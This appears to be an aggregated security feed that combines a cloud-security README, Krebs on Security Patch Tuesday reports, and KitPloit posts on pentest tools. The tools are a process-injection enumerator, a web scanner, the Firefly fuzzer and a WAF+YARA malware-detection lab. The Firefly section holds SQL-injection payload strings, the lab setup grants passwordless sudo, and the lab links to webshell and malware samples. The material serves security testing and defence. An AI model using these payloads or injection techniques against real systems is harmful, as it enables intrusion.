  1. Clone repo: git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
  2. Run: cd ZeusCloud && make quick-deploy
  3. Visit http://localhost:80

Check out our Get Started guide for more details.

A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!

Sandbox

Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!

Features

  • Discover Attack Paths - Discover toxic risk combinations an attacker can use to penetrate your environment.
  • Graphical Context - Understand context behind security findings with graphical visualizations.
  • Access Explorer - Visualize who has access to what with an IAM visualization engine.
  • Identify Misconfigurations - Discover the highest risk-of-exploit misconfigurations in your environments.
  • Configurability - Configure which security rules are active, which alerts should be muted, and more.
  • Security as Code - Modify rules or write your own with our extensible security as code approach.
  • Remediation - Follow step by step guides to remediate security findings.
  • Compliance - Ensure your cloud posture is compliant with PCI DSS, CIS benchmarks and more!

Why ZeusCloud?

Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.

We had to take action.

  • We noticed traditional cloud security tools are opaque, confusing, time consuming to set up, and expensive as you scale your cloud environment
  • Cybersecurity vendors don't provide much actionable information to security, engineering, and devops teams by inundating them with non-contextual alerts
  • ZeusCloud is easy to set up, transparent, and configurable, so you can prioritize the most important risks
  • Best of all, you can use ZeusCloud for free!

Future Roadmap

  • Integrations with vulnerability scanners
  • Integrations with secret scanners
  • Shift-left: Remediate risks earlier in the SDLC with context from your deployments
  • Support for Azure and GCP environments

Contributing

We love contributions of all sizes. What would be most helpful first:

  • Please give us feedback in our Slack.
  • Open a PR (see our instructions below on developing ZeusCloud locally)
  • Submit a feature request or bug report through Github Issues.

Development

Run containers in development mode:

cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build

Reset neo4j and/or postgres data with the following:

rm -rf .compose/neo4j
rm -rf .compose/postgres

To develop on frontend, make the the code changes and save.

To develop on backend, run

docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend

To access the UI, go to: http://localhost:80.

Security

Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.

Open-source vs. cloud-hosted

This repo is freely available under the Apache 2.0 license.

We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!

Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!



☐ ☆ ✇ Krebs on Security

Apple & Microsoft Patch Tuesday, July 2023 Edition

By: BrianKrebs — July 11th 2023 at 22:55

Microsoft Corp. today released software updates to quash 130 security bugs in its Windows operating systems and related software, including at least five flaws that are already seeing active exploitation. Meanwhile, Apple customers have their own zero-day woes again this month: On Monday, Apple issued (and then quickly pulled) an emergency update to fix a zero-day vulnerability that is being exploited on MacOS and iOS devices.

On July 10, Apple pushed a “Rapid Security Response” update to fix a code execution flaw in the Webkit browser component built into iOS, iPadOS, and macOS Ventura. Almost as soon as the patch went out, Apple pulled the software because it was reportedly causing problems loading certain websites. MacRumors says Apple will likely re-release the patches when the glitches have been addressed.

Launched in May, Apple’s Rapid Security Response updates are designed to address time-sensitive vulnerabilities, and this is the second month Apple has used it. July marks the sixth month this year that Apple has released updates for zero-day vulnerabilities — those that get exploited by malware or malcontents before there is an official patch available.

If you rely on Apple devices and don’t have automatic updates enabled, please take a moment to check the patch status of your various iDevices. The latest security update that includes the fix for the zero-day bug should be available in iOS/iPadOS 16.5.1, macOS 13.4.1, and Safari 16.5.2.

On the Windows side, there are at least four vulnerabilities patched this month that earned high CVSS (badness) scores and that are already being exploited in active attacks, according to Microsoft. They include CVE-2023-32049, which is a hole in Windows SmartScreen that lets malware bypass security warning prompts; and CVE-2023-35311 allows attackers to bypass security features in Microsoft Outlook.

The two other zero-day threats this month for Windows are both privilege escalation flaws. CVE-2023-32046 affects a core Windows component called MSHTML, which is used by Windows and other applications, like Office, Outlook and Skype. CVE-2023-36874 is an elevation of privilege bug in the Windows Error Reporting Service.

Many security experts expected Microsoft to address a fifth zero-day flaw — CVE-2023-36884 — a remote code execution weakness in Office and Windows.

“Surprisingly, there is no patch yet for one of the five zero-day vulnerabilities,” said Adam Barnett, lead software engineer at Rapid7. “Microsoft is actively investigating publicly disclosed vulnerability, and promises to update the advisory as soon as further guidance is available.”

Barnett notes that Microsoft links exploitation of this vulnerability with Storm-0978, the software giant’s name for a cybercriminal group based out of Russia that is identified by the broader security community as RomCom.

“Exploitation of CVE-2023-36884 may lead to installation of the eponymous RomCom trojan or other malware,” Barnett said. “[Microsoft] suggests that RomCom / Storm-0978 is operating in support of Russian intelligence operations. The same threat actor has also been associated with ransomware attacks targeting a wide array of victims.”

Microsoft’s advisory on CVE-2023-36884 is pretty sparse, but it does include a Windows registry hack that should help mitigate attacks on this vulnerability. Microsoft has also published a blog post about phishing campaigns tied to Storm-0978 and to the exploitation of this flaw.

Barnett said it’s while it’s possible that a patch will be issued as part of next month’s Patch Tuesday, Microsoft Office is deployed just about everywhere, and this threat actor is making waves.

“Admins should be ready for an out-of-cycle security update for CVE-2023-36884,” he said.

Microsoft also today released new details about how it plans to address the existential threat of malware that is cryptographically signed by…wait for it….Microsoft.

In late 2022, security experts at Sophos, Trend Micro and Cisco warned that ransomware criminals were using signed, malicious drivers in an attempt to evade antivirus and endpoint detection and response (EDR) tools.

In a blog post today, Sophos’s Andrew Brandt wrote that Sophos identified 133 malicious Windows driver files that were digitally signed since April 2021, and found 100 of those were actually signed by Microsoft. Microsoft said today it is taking steps to ensure those malicious driver files can no longer run on Windows computers.

As KrebsOnSecurity noted in last month’s story on malware signing-as-a-service, code-signing certificates are supposed to help authenticate the identity of software publishers, and provide cryptographic assurance that a signed piece of software has not been altered or tampered with. Both of these qualities make stolen or ill-gotten code-signing certificates attractive to cybercriminal groups, who prize their ability to add stealth and longevity to malicious software.

Dan Goodin at Ars Technica contends that whatever Microsoft may be doing to keep maliciously signed drivers from running on Windows is being bypassed by hackers using open source software that is popular with video game cheaters.

“The software comes in the form of two software tools that are available on GitHub,” Goodin explained. “Cheaters use them to digitally sign malicious system drivers so they can modify video games in ways that give the player an unfair advantage. The drivers clear the considerable hurdle required for the cheat code to run inside the Windows kernel, the fortified layer of the operating system reserved for the most critical and sensitive functions.”

Meanwhile, researchers at Cisco’s Talos security team found multiple Chinese-speaking threat groups have repurposed the tools—one apparently called “HookSignTool” and the other “FuckCertVerifyTimeValidity.”

“Instead of using the kernel access for cheating, the threat actors use it to give their malware capabilities it wouldn’t otherwise have,” Goodin said.

For a closer look at the patches released by Microsoft today, check out the always-thorough Patch Tuesday roundup from the SANS Internet Storm Center. And it’s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: AskWoody.com usually has the lowdown on any patches that may be causing problems for Windows users.

And as ever, please consider backing up your system or at least your important documents and data before applying system updates. If you encounter any problems with these updates, please drop a note about it here in the comments.

☐ ☆ ✇ KitPloit - PenTest Tools!

Wanderer - An Open-Source Process Injection Enumeration Tool Written In C#

By: Zion3R — July 3rd 2023 at 12:30


Wanderer is an open-source program that collects information about running processes. This information includes the integrity level, the presence of the AMSI as a loaded module, whether it is running as 64-bit or 32-bit as well as the privilege level of the current process. This information is extremely helpful when building payloads catered to the ideal candidate for process injection.

This is a project that I started working on as I progressed through Offensive Security's PEN-300 course. One of my favorite modules from the course is the process injection & migration section which inspired me to be build a tool to help me be more efficient in during that activity. A special thanks goes out to ShadowKhan who provided valuable feedback which helped provide creative direction to make this utility visually appealing and enhanced its usability with suggested filtering capabilities.


Usage

Injection Enumeration >> https://github.com/gh0x0st Usage: wanderer [target options] <value> [filter options] <value> [output options] <value> Target Options: -i, --id, Target a single or group of processes by their id number -n, --name, Target a single or group of processes by their name -c, --current, Target the current process and reveal the current privilege level -a, --all, Target every running process Filter Options: --include-denied, Include instances where process access is denied --exclude-32, Exclude instances where the process architecture is 32-bit --exclude-64, Exclude instances where the process architecture is 64-bit --exclude-amsiloaded, Exclude instances where amsi.dll is a loaded process module --exclude-amsiunloaded, Exclude instances where amsi is not loaded process module --exclude-integrity, Exclude instances where the process integrity level is a specific value Output Options: --output-nested, Output the results in a nested style view -q, --quiet, Do not output the banner Examples: Enumerate the process with id 12345 C:\> wanderer --id 12345 Enumerate all processes with the names process1 and processs2 C:\> wanderer --name process1,process2 Enumerate the current process privilege level C:\> wanderer --current Enumerate all 32-bit processes C:\wanderer --all --exclude-64 Enumerate all processes where is AMSI is loaded C:\> wanderer --all --exclude-amsiunloaded Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32" dir="auto">
PS C:\> .\wanderer.exe

>> Process Injection Enumeration
>> https://github.com/gh0x0st

Usage: wanderer [target options] <value> [filter options] <value> [output options] <value>

Target Options:

-i, --id, Target a single or group of processes by their id number
-n, --name, Target a single or group of processes by their name
-c, --current, Target the current process and reveal the current privilege level
-a, --all, Target every running process

Filter Options:

--include-denied, Include instances where process access is denied
--exclude-32, Exclude instances where the process architecture is 32-bit
--exclude-64, Exclude instances where the process architecture is 64-bit
--exclude-amsiloaded, Exclude instances where amsi.dll is a loaded proces s module
--exclude-amsiunloaded, Exclude instances where amsi is not loaded process module
--exclude-integrity, Exclude instances where the process integrity level is a specific value

Output Options:

--output-nested, Output the results in a nested style view
-q, --quiet, Do not output the banner

Examples:

Enumerate the process with id 12345
C:\> wanderer --id 12345

Enumerate all processes with the names process1 and processs2
C:\> wanderer --name process1,process2

Enumerate the current process privilege level
C:\> wanderer --current

Enumerate all 32-bit processes
C:\wanderer --all --exclude-64

Enumerate all processes where is AMSI is loaded
C:\> wanderer --all --exclude-amsiunloaded

Enumerate all processes with the names pwsh,powershell,spotify and exclude instances where the integrity level is untrusted or low and exclude 32-bit processes
C:\> wanderer --name pwsh,powershell,spotify --exclude-integrity untrusted,low --exclude-32

Screenshots

Example 1

Example 2

Example 3

Example 4

Example 5



☐ ☆ ✇ KitPloit - PenTest Tools!

Scanner-and-Patcher - A Web Vulnerability Scanner And Patcher

By: Zion3R — June 21st 2023 at 12:30


This tools is very helpful for finding vulnerabilities present in the Web Applications.

  • A web application scanner explores a web application by crawling through its web pages and examines it for security vulnerabilities, which involves generation of malicious inputs and evaluation of application's responses.
    • These scanners are automated tools that scan web applications to look for security vulnerabilities. They test web applications for common security problems such as cross-site scripting (XSS), SQL injection, and cross-site request forgery (CSRF).
    • This scanner uses different tools like nmap, dnswalk, dnsrecon, dnsenum, dnsmap etc in order to scan ports, sites, hosts and network to find vulnerabilites like OpenSSL CCS Injection, Slowloris, Denial of Service, etc.

Tools Used

Serial No. Tool Name Serial No. Tool Name
1 whatweb 2 nmap
3 golismero 4 host
5 wget 6 uniscan
7 wafw00f 8 dirb
9 davtest 10 theharvester
11 xsser 12 fierce
13 dnswalk 14 dnsrecon
15 dnsenum 16 dnsmap
17 dmitry 18 nikto
19 whois 20 lbd
21 wapiti 22 devtest
23 sslyze

Working

Phase 1

  • User has to write:- "python3 web_scan.py (https or http) ://example.com"
  • At first program will note initial time of running, then it will make url with "www.example.com".
  • After this step system will check the internet connection using ping.
  • Functionalities:-
    • To navigate to helper menu write this command:- --help for update --update
    • If user want to skip current scan/test:- CTRL+C
    • To quit the scanner use:- CTRL+Z
    • The program will tell scanning time taken by the tool for a specific test.

Phase 2

  • From here the main function of scanner will start:
  • The scanner will automatically select any tool to start scanning.
  • Scanners that will be used and filename rotation (default: enabled (1)
  • Command that is used to initiate the tool (with parameters and extra params) already given in code
  • After founding vulnerability in web application scanner will classify vulnerability in specific format:-
    • [Responses + Severity (c - critical | h - high | m - medium | l - low | i - informational) + Reference for Vulnerability Definition and Remediation]
    • Here c or critical defines most vulnerability wheres l or low is for least vulnerable system

Definitions:-

  • Critical:- Vulnerabilities that score in the critical range usually have most of the following characteristics: Exploitation of the vulnerability likely results in root-level compromise of servers or infrastructure devices.Exploitation is usually straightforward, in the sense that the attacker does not need any special authentication credentials or knowledge about individual victims, and does not need to persuade a target user, for example via social engineering, into performing any special functions.

  • High:- An attacker can fully compromise the confidentiality, integrity or availability, of a target system without specialized access, user interaction or circumstances that are beyond the attacker’s control. Very likely to allow lateral movement and escalation of attack to other systems on the internal network of the vulnerable application. The vulnerability is difficult to exploit. Exploitation could result in elevated privileges. Exploitation could result in a significant data loss or downtime.

  • Medium:- An attacker can partially compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control may be required for an attack to succeed. Very likely to be used in conjunction with other vulnerabilities to escalate an attack.Vulnerabilities that require the attacker to manipulate individual victims via social engineering tactics. Denial of service vulnerabilities that are difficult to set up. Exploits that require an attacker to reside on the same local network as the victim. Vulnerabilities where exploitation provides only very limited access. Vulnerabilities that require user privileges for successful exploitation.

  • Low:- An attacker has limited scope to compromise the confidentiality, integrity, or availability of a target system. Specialized access, user interaction, or circumstances that are beyond the attacker’s control is required for an attack to succeed. Needs to be used in conjunction with other vulnerabilities to escalate an attack.

  • Info:- An attacker can obtain information about the web site. This is not necessarily a vulnerability, but any information which an attacker obtains might be used to more accurately craft an attack at a later date. Recommended to restrict as far as possible any information disclosure.

  • CVSS V3 SCORE RANGE SEVERITY IN ADVISORY
    0.1 - 3.9 Low
    4.0 - 6.9 Medium
    7.0 - 8.9 High
    9.0 - 10.0 Critical

Vulnerabilities

  • After this scanner will show results which inclues:
    • Response time
    • Total time for scanning
    • Class of vulnerability

Remediation

  • Now, Scanner will tell about harmful effects of that specific type vulnerabilility.
  • Scanner tell about sources to know more about the vulnerabilities. (websites).
  • After this step, scanner suggests some remdies to overcome the vulnerabilites.

Phase 3

  • Scanner will Generate a proper report including
    • Total number of vulnerabilities scanned
    • Total number of vulnerabilities skipped
    • Total number of vulnerabilities detected
    • Time taken for total scan
    • Details about each and every vulnerabilites.
  • Writing all scan files output into SA-Debug-ScanLog for debugging purposes under the same directory
  • For Debugging Purposes, You can view the complete output generated by all the tools named SA-Debug-ScanLog.

Use

Use Program as python3 web_scan.py (https or http) ://example.com
--help
--update
Serial No. Vulnerabilities to Scan Serial No. Vulnerabilities to Scan
1 IPv6 2 Wordpress
3 SiteMap/Robot.txt 4 Firewall
5 Slowloris Denial of Service 6 HEARTBLEED
7 POODLE 8 OpenSSL CCS Injection
9 FREAK 10 Firewall
11 LOGJAM 12 FTP Service
13 STUXNET 14 Telnet Service
15 LOG4j 16 Stress Tests
17 WebDAV 18 LFI, RFI or RCE.
19 XSS, SQLi, BSQL 20 XSS Header not present
21 Shellshock Bug 22 Leaks Internal IP
23 HTTP PUT DEL Methods 24 MS10-070
25 Outdated 26 CGI Directories
27 Interesting Files 28 Injectable Paths
29 Subdomains 30 MS-SQL DB Service
31 ORACLE DB Service 32 MySQL DB Service
33 RDP Server over UDP and TCP 34 SNMP Service
35 Elmah 36 SMB Ports over TCP and UDP
37 IIS WebDAV 38 X-XSS Protection

Installation

git clone https://github.com/Malwareman007/Scanner-and-Patcher.git
cd Scanner-and-Patcher/setup
python3 -m pip install --no-cache-dir -r requirements.txt

Screenshots of Scanner

Contributions

Template contributions , Feature Requests and Bug Reports are more than welcome.

Authors

GitHub: @Malwareman007
GitHub: @Riya73
GitHub:@nano-bot01

Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page.



☐ ☆ ✇ KitPloit - PenTest Tools!

Firefly - Black Box Fuzzer For Web Applications

By: Zion3R — June 17th 2023 at 12:30

Firefly is an advanced black-box fuzzer and not just a standard asset discovery tool. Firefly provides the advantage of testing a target with a large number of built-in checks to detect behaviors in the target.

Note:

Firefly is in a very new stage (v1.0) but works well for now, if the target does not contain too much dynamic content. Firefly still detects and filters dynamic changes, but not yet perfectly.

 

Advantages

  • Hevy use of gorutines and internal hardware for great preformance
  • Built-in engine that handles each task for "x" response results inductively
  • Highly cusomized to handle more complex fuzzing
  • Filter options and request verifications to avoid junk results
  • Friendly error and debug output
  • Build in payloads (default list are mixed with the wordlist from seclists)
  • Payload tampering and encoding functionality

Features


Installation

go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

If the above install method do not work try the following:

git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Usage

Simple

firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Advanced usage

Request

Different types of request input that can be used

Basic

firefly -u 'http://example.com/?query=FUZZ' --timeout 7000

Request with different methods and protocols

firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws

Pipeline

echo 'http://example.com/?query=FUZZ' | firefly 

HTTP Raw

firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

This will send the HTTP Raw and auto detect all GET and/or POST parameters to fuzz.

firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Request Verifier

Request verifier is the most important part. This feature let Firefly know the core behavior of the target your fuzz. It's important to do quality over quantity. More verfiy requests will lead to better quality at the cost of internal hardware preformance (depending on your hardware)

firefly -u 'http://example.com/?query=FUZZ' -e 

Payloads

Payload can be highly customized and with a good core wordlist it's possible to be able to fully adapt the payload wordlist within Firefly itself.

Payload debug

Display the format of all payloads and exit

firefly -show-payload

Tampers

List of all Tampers avalible

firefly -list-tamper

Tamper all paylodas with given type (More than one can be used separated by comma)

firefly -u 'http://example.com/?query=FUZZ' -e s2c

Encode

firefly -u 'http://example.com/?query=FUZZ' -e hex

Hex then URL encode all payloads

firefly -u 'http://example.com/?query=FUZZ' -e hex,url

Payload regex replace

firefly -u 'http://example.com/?query=FUZZ' -pr '\([0-9]+=[0-9]+\) => (13=(37-24))'

The Payloads: ' or (1=1)-- - and " or(20=20)or " Will result in: ' or (13=(37-24))-- - and " or(13=(37-24))or " Where the => (with spaces) inducate the "replace to".

Filters

Filter options to filter/match requests that include a given rule.

Filter response to ignore (filter) status code 302 and line count 0

firefly -u 'http://example.com/?query=FUZZ' -fc 302 -fl 0

Filter responses to include (match) regex, and status code 200

firefly -u 'http://example.com/?query=FUZZ' -mr '[Ee]rror (at|on) line \d' -mc 200
firefly -u 'http://example.com/?query=FUZZ' -mr 'MySQL' -mc 200

Preformance

Preformance and time delays to use for the request process

Threads / Concurrency

firefly -u 'http://example.com/?query=FUZZ' -t 35

Time Delay in millisecounds (ms) for each Concurrency

FireFly -u 'http://example.com/?query=FUZZ' -t 35 -dl 2000

Wordlists

Wordlist that contains the paylaods can be added separatly or extracted from a given folder

Single Wordlist with its attack type

firefly -u 'http://example.com/?query=FUZZ' -w wordlist.txt:fuzz

Extract all wordlists inside a folder. Attack type is depended on the suffix <type>_wordlist.txt

firefly -u 'http://example.com/?query=FUZZ' -w wl/

Example

Wordlists names inside folder wl :

  1. fuzz_wordlist.txt
  2. time_wordlist.txt

Output

JSON output is strongly recommended. This is because you can benefit from the jq tool to navigate throw the result and compare it.

(If Firefly is pipeline chained with other tools, standard plaintext may be a better choice.)

Simple plaintext output format

firefly -u 'http://example.com/?query=FUZZ' -o file.txt

JSON output format (recommended)

firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

Community

Everyone in the community are allowed to suggest new features, improvements and/or add new payloads to Firefly just make a pull request or add a comment with your suggestions!



☐ ☆ ✇ Krebs on Security

Microsoft Patch Tuesday, June 2023 Edition

By: BrianKrebs — June 13th 2023 at 20:44

Microsoft Corp. today released software updates to fix dozens of security vulnerabilities in its Windows operating systems and other software. This month’s relatively light patch load has another added bonus for system administrators everywhere: It appears to be the first Patch Tuesday since March 2022 that isn’t marred by the active exploitation of a zero-day vulnerability in Microsoft’s products.

June’s Patch Tuesday features updates to plug at least 70 security holes, and while none of these are reported by Microsoft as exploited in-the-wild yet, Redmond has flagged several in particular as “more likely to be exploited.”

Top of the list on that front is CVE-2023-29357, which is a “critical” bug in Microsoft SharePoint Server that can be exploited by an unauthenticated attacker on the same network. This SharePoint flaw earned a CVSS rating of 9.8 (10.0 is the most dangerous).

“An attacker able to gain admin access to an internal SharePoint server could do a lot of harm to an organization,” said Kevin Breen, director of cyber threat research at Immersive Labs. “Gaining access to sensitive and privileged documents, stealing and deleting documents as part of a ransomware attack or replacing real documents with malicious copies to further infect users in the organization.”

There are at least three other vulnerabilities fixed this month that earned a collective 9.8 CVSS score, and they all concern a widely-deployed component called the Windows Pragmatic General Multicast (PGM), which is used for delivering multicast data — such as video streaming or online gaming.

Security firm Action1 says all three bugs (CVE-2023-32015, CVE-2023-32014, and CVE-2023-29363) can be exploited over the network without requiring any privileges or user interaction, and affected systems include all versions of Windows Server 2008 and later, as well as Windows 10 and later.

It wouldn’t be a proper Patch Tuesday if we also didn’t also have scary security updates for organizations still using Microsoft Exchange for email. Breen said this month’s Exchange bugs (CVE-2023-32031 and CVE-2023-28310) closely mirror the vulnerabilities identified as part of ProxyNotShell exploits, where an authenticated user in the network could exploit a vulnerability in the Exchange to gain code execution on the server.

Breen said while Microsoft’s patch notes indicate that an attacker must already have gained access to a vulnerable host in the network, this is typically achieved through social engineering attacks with spear phishing to gain initial access to a host before searching for other internal targets.

“Just because your Exchange server doesn’t have internet-facing authentication doesn’t mean it’s protected,” Breen said, noting that Microsoft says the Exchange flaws are not difficult for attackers to exploit.

For a closer look at the patches released by Microsoft today and indexed by severity and other metrics, check out the always-useful Patch Tuesday roundup from the SANS Internet Storm Center. And it’s not a bad idea to hold off updating for a few days until Microsoft works out any kinks in the updates: AskWoody.com usually has the lowdown on any patches that may be causing problems for Windows users.

As always, please consider backing up your system or at least your important documents and data before applying system updates. And if you run into any problems with these updates, please drop a note about it here in the comments.

☐ ☆ ✇ KitPloit - PenTest Tools!

Wafaray - Enhance Your Malware Detection With WAF + YARA (WAFARAY)

By: Zion3R — May 18th 2023 at 12:30

WAFARAY is a LAB deployment based on Debian 11.3.0 (stable) x64 made and cooked between two main ingredients WAF + YARA to detect malicious files (e.g. webshells, virus, malware, binaries) typically through web functions (upload files).


Purpose

In essence, the main idea came to use WAF + YARA (YARA right-to-left = ARAY) to detect malicious files at the WAF level before WAF can forward them to the backend e.g. files uploaded through web functions see: https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

When a web page allows uploading files, most of the WAFs are not inspecting files before sending them to the backend. Implementing WAF + YARA could provide malware detection before WAF forwards the files to the backend.

Do malware detection through WAF?

Yes, one solution is to use ModSecurity + Clamav, most of the pages call ClamAV as a process and not as a daemon, in this case, analysing a file could take more than 50 seconds per file. See this resource: https://kifarunix.com/intercept-malicious-file-upload-with-modsecurity-and-clamav/

Do malware detection through WAF + YARA?

:-( A few clues here Black Hat Asia 2019 please continue reading and see below our quick LAB deployment.

WAFARAY: how does it work ?

Basically, It is a quick deployment (1) with pre-compiled and ready-to-use YARA rules via ModSecurity (WAF) using a custom rule; (2) this custom rule will perform an inspection and detection of the files that might contain malicious code, (3) typically web functions (upload files) if the file is suspicious will reject them receiving a 403 code Forbidden by ModSecurity.

✔️The YaraCompile.py compiles all the yara rules. (Python3 code)
✔️The test.conf is a virtual host that contains the mod security rules. (ModSecurity Code)
✔️ModSecurity rules calls the modsec_yara.py in order to inspect the file that is trying to upload. (Python3 code)
✔️Yara returns two options 1 (200 OK) or 0 (403 Forbidden)

Main Paths:

  • Yara Compiled rules: /YaraRules/Compiled
  • Yara Default rules: /YaraRules/rules
  • Yara Scripts: /YaraRules/YaraScripts
  • Apache vhosts: /etc/apache2/sites-enabled
  • Temporal Files: /temporal

Approach

  • Blueteamers: Rule enforcement, best alerting, malware detection on files uploaded through web functions.
  • Redteamers/pentesters: GreyBox scope , upload and bypass with a malicious file, rule enforcement.
  • Security Officers: Keep alerting, threat hunting.
  • SOC: Best monitoring about malicious files.
  • CERT: Malware Analysis, Determine new IOC.

Building Detection Lab

The Proof of Concept is based on Debian 11.3.0 (stable) x64 OS system, OWASP CRC v3.3.2 and Yara 4.0.5, you will find the automatic installation script here wafaray_install.sh and an optional manual installation guide can be found here: manual_instructions.txt also a PHP page has been created as a "mock" to observe the interaction and detection of malicious files using WAF + YARA.

Installation (recommended) with shell scripts

✔️Step 2: Deploy using VMware or VirtualBox
✔️Step 3: Once installed, please follow the instructions below:
alex@waf-labs:~$ su root 
root@waf-labs:/home/alex#

# Remember to change YOUR_USER by your username (e.g waf)
root@waf-labs:/home/alex# sed -i 's/^\(# User privi.*\)/\1\nalex ALL=(ALL) NOPASSWD:ALL/g' /etc/sudoers
root@waf-labs:/home/alex# exit
alex@waf-labs:~$ sudo sed -i 's/^\(deb cdrom.*\)/#\1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb\-src http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ sudo sed -i 's/^# \(deb http.*\)/ \1/g' /etc/apt/sources.list
alex@waf-labs:~$ echo -ne "\n\ndeb http://deb.debian.org/debian/ bullseye main\ndeb-src http://deb.debian.org/debian/ bullseye main\n" | sudo tee -a /etc/apt/sources.list
alex@waf-labs:~$ sudo apt-get update
alex@waf-labs:~$ sudo apt-get install sudo -y
alex@waf-labs:~$ sudo apt-get install git vim dos2unix net-tools -y
alex@waf-labs:~$ git clone https://github.com/alt3kx/wafarayalex@waf-labs:~$ cd wafaray
alex@waf-labs:~$ dos2unix wafaray_install.sh
alex@waf-labs:~$ chmod +x wafaray_install.sh
alex@waf-labs:~$ sudo ./wafaray_install.sh >> log_install.log

# Test your LAB environment
alex@waf-labs:~$ firefox localhost:8080/upload.php

Yara Rules

Once the Yara Rules were downloaded and compiled.

It is similar to when you deploy ModSecurity, you need to customize what kind of rule you need to apply. The following log is an example of when the Web Application Firewall + Yara detected a malicious file, in this case, eicar was detected.

Message: Access denied with code 403 (phase 2). File "/temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA" rejected by 
the approver script "/YaraRules/YaraScripts/modsec_yara.py": 0 SUSPECTED [YaraSignature: eicar]
[file "/etc/apache2/sites-enabled/test.conf"] [line "56"] [id "500002"]
[msg "Suspected File Upload:eicar.com.txt -> /temporal/20220812-184146-YvbXKilOKdNkDfySME10ywAAAAA-file-Wx1hQA - URI: /upload.php"]

Testing WAFARAY... voilà...

Stop / Start ModSecurity

$ sudo service apache2 stop
$ sudo service apache2 start

Apache Logs

$ cd /var/log
$ sudo tail -f apache2/test_access.log apache2/test_audit.log apache2/test_error.log

Demos

Be careful about your test. The following demos were tested on isolated virtual machines.

Demo 1 - EICAR

A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware: https://secure.eicar.org/eicar.com.txt) NOT EXECUTE THE FILE.

Demo 2 - WebShell.php

For this demo, we disable the rule 933110 - PHP Inject Attack to validate Yara Rules. A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of WebShell PHP: https://github.com/drag0s/php-webshell) NOT EXECUTE THE FILE.

Demo 3 - Malware Bazaar (RecordBreaker) Published: 2022-08-13

A malicious file is uploaded, and the ModSecurity rules plus Yara denied uploading file to the backend if the file matched with at least one Yara Rule. (Example of Malware Bazaar (RecordBreaker): https://bazaar.abuse.ch/sample/94ffc1624939c5eaa4ed32d19f82c369333b45afbbd9d053fa82fe8f05d91ac2/) NOT EXECUTE THE FILE.

YARA Rules sources

In case that you want to download more yara rules, you can see the following repositories:

References

Roadmap until next release

  • Malware Hash Database (MLDBM). The Database stores the MD5 or SHA1 that files were detected as suspicious.
  • To be tested CRS Modsecurity v.3.3.3 new rules
  • ModSecurity rules improvement to malware detection with Database.
  • To be created blacklist and whitelist related to MD5 or SHA1.
  • To be tested, run in background if the Yara analysis takes more than 3 seconds.
  • To be tested, new payloads, example: Powershell Obfuscasted (WebShells)
  • Remarks for live enviroments. (WAF AWS, WAF GCP, ...)

Authors

Alex Hernandez aka (@_alt3kx_)
Jesus Huerta aka @mindhack03d

Contributors

Israel Zeron Medina aka @spk085



❌